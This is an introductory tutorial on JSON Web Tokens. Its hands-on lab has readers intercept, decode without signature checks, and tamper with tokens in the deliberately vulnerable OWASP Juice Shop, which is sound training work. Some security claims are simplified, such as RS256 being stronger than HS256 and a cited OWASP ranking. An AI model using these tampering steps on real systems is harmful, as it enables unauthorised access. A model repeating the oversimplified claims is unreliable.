What is JWT? A Beginner's Guide to JSON Web Tokens

TL;DR - Key Takeaways

• JSON Web Token (JWT) is a compact, URL-safe means of representing claims to be transferred between two parties.
• JWTs are commonly used for authorization and information exchange in web applications.
• A JWT consists of three parts: Header, Payload, and Signature.
• They are often used in Single Sign-On (SSO) systems due to their stateless nature.
• JWT security is crucial; improper implementation can lead to vulnerabilities like token tampering or replay attacks.
• Understanding JWTs involves grasping their structure, how they are created, and how they are validated.
• Always keep secret keys secure and use HTTPS to protect JWTs from being intercepted.

What is JWT?

JSON Web Token (JWT) is like a compact envelope that securely carries information between two parties over the web. Imagine sending a sealed letter where the contents are visible but tamper-proof, thanks to a special wax seal. JWT achieves this by encoding information in a JSON format and ensuring its integrity with cryptographic signatures.

A JWT is composed of three parts:

1. Header: Contains metadata about the type of token and the algorithm used for signing (e.g., HMAC SHA256).
2. Payload: The core data you want to transmit, often including user information or claims.
3. Signature: Ensures the token hasn't been altered. It's created by encoding the header and payload and signing it with a secret key.

Combined, these parts are encoded in Base64URL and concatenated with periods, resulting in a string like: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c.

Why Does This Matter?

In today's digital landscape, security is paramount. JWTs are integral to web security, enabling secure and efficient data transmission. They are widely used in applications for:

• Authorization: Once a user logs in, each subsequent request will include the JWT, allowing the user to access routes, services, and resources that are permitted with that token.
• Information Exchange: JWTs are a good way of securely transmitting information between parties. Since they can be signed, the receiving party can verify the sender's authenticity.

Security breach statistics indicate that improper token handling can lead to critical vulnerabilities. According to a 2022 report by OWASP, token mismanagement is among the top 10 web application security risks, which can affect millions of users.

Types / Categories

JWTs are generally classified by their usage and structure. Here’s a breakdown:

Type	Description
Access Token	Used to access protected resources. Short-lived and often used in OAuth 2.0.
ID Token	Contains user profile information, primarily used in OpenID Connect.
Refresh Token	Used to obtain a new access token without re-authentication. Longer-lived and sensitive.

JWT vs Other Tokens

Feature	JWT	OAuth Access Token	SAML
Format	JSON	Varies (often JSON)	XML
Encoding	Base64URL	Varies	Base64
Signature	Yes	Varies	Yes
Use Case	API Security, SSO	Authorization	Authentication, SSO

How It Works — Step by Step

Understanding JWT involves knowing how it is created, transmitted, and validated:

1. Creation: A server generates a JWT after verifying user credentials. Information is encoded into the payload.
2. Signing: The token is signed using the server's secret key or a public/private key pair.
3. Transmission: The JWT is sent to the client, stored (often in local storage or a cookie), and included in future requests.
4. Validation: The server validates the token’s signature and checks its claims to ensure authenticity and integrity.

sequenceDiagram
    participant Client
    participant Server
    Client->>Server: Sends Login Request (username, password)
    Server->>Client: Returns JWT
    Client->>Server: Sends Request with JWT
    Server->>Client: Validates JWT & Responds with Data

{
  "alg": "HS256",
  "typ": "JWT"
}

• A sample JWT header indicating the algorithm used for signing.

Hands-On Lab / Demo

For a practical demonstration, let's use the OWASP Juice Shop, a vulnerable web application ideal for learning about JWT security.

Step-by-Step Lab:

1. Setup Juice Shop: Use Docker to set up the Juice Shop environment.

   docker run --rm -p 3000:3000 bkimminich/juice-shop
   

   • This command starts the Juice Shop server on your local machine.

2. Intercept JWT: Use a tool like Burp Suite to capture the HTTP traffic and identify JWTs being transmitted.

3. Decode JWT: Use an online tool or a script to decode the JWT and inspect its contents.

   import jwt
   token = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obi5kb2UifQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c'
   decoded = jwt.decode(token, options={"verify_signature": False})
   print(decoded)
   

   • This script decodes a JWT without verifying the signature, useful for inspection.

4. Modify and Resend: Attempt to tamper with the payload and resend the JWT to analyze the server's response.

Common Misconceptions

Myth 1: JWTs Are Always Secure

Many believe JWTs are secure by default. However, their security depends on proper implementation, including securing the secret key and using HTTPS.

Myth 2: JWTs Encrypt Data

JWTs do not encrypt data; they encode it. If sensitive information is included, it should be encrypted separately.

📌 Key Point: JWTs are not inherently secure. Their security depends on the algorithms and configurations used.

Myth 3: JWTs Are Best for Everything

While versatile, JWTs are not ideal for every use case, particularly where token revocation is necessary.

How to Defend Against It

1. Use Strong Algorithms: Always use strong, secure signing algorithms like RS256 instead of HS256.

   {
     "alg": "RS256",
     "typ": "JWT"
   }
   

   • Example of a JWT header with a strong algorithm.

2. Secure Key Management: Keep secret keys private and rotate them regularly.

3. Implement Token Expiration: Set short expiration times for JWTs to limit their lifespan.

4. Store Securely: Store JWTs securely, preferably in HTTP-only cookies, to prevent XSS attacks.

   set-cookie: jwt=eyJhbGci...; HttpOnly; Secure
   

   • Example of setting a secure cookie with a JWT.

5. Use HTTPS: Always transmit JWTs over HTTPS to prevent interception.

📌 Key Point: Implementing strong algorithms and secure storage practices is critical for JWT security.

Further Learning Resources

• OWASP Cheat Sheet: JWT
• PortSwigger Web Security Academy
• JWT.io
• Books: "Web Application Security" by Andrew Hoffman
• Platforms: Hack The Box, TryHackMe

Conclusion

JWTs are a fundamental aspect of modern web security, providing a mechanism for secure data transmission and user authentication across applications. While they offer many advantages, it's crucial to implement them securely to avoid vulnerabilities. As you delve deeper into the world of web security, remember that understanding and proper implementation are your best defenses against potential threats. Keep learning, experimenting, and securing your applications with best practices.